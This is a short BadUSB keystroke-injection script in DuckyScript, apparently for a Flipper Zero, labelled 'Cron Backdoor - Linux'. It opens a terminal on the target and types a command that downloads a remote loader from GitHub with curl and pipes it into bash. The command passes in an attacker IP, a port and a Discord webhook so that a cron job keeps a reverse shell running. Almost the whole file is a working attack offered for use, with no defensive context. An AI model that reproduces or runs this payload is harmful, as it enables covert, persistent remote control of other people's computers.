REM ============================================================
REM 🔒 Cron Backdoor - Linux
REM ============================================================
REM Author: dil1thium
REM Version: 3.0 (Modular)
REM Target: Linux
REM Category: Persistence
REM
REM Creates cron job for persistent reverse shell.
REM
REM CONFIGURE:
REM   YOUR_DISCORD_WEBHOOK - Status notification
REM   YOUR_IP - Attacker IP
REM   YOUR_PORT - Port
REM ============================================================
DELAY 500
CTRL ALT t
DELAY 1500
STRING DC="YOUR_DISCORD_WEBHOOK" IP="YOUR_IP" PT="YOUR_PORT" M="persist" bash -c 'curl -sL https://raw.githubusercontent.com/reschjonas/FlipperZero_BadUSB/main/remote-payloads/loaders/loader.sh|bash' &
ENTER
DELAY 500
STRING exit
ENTER
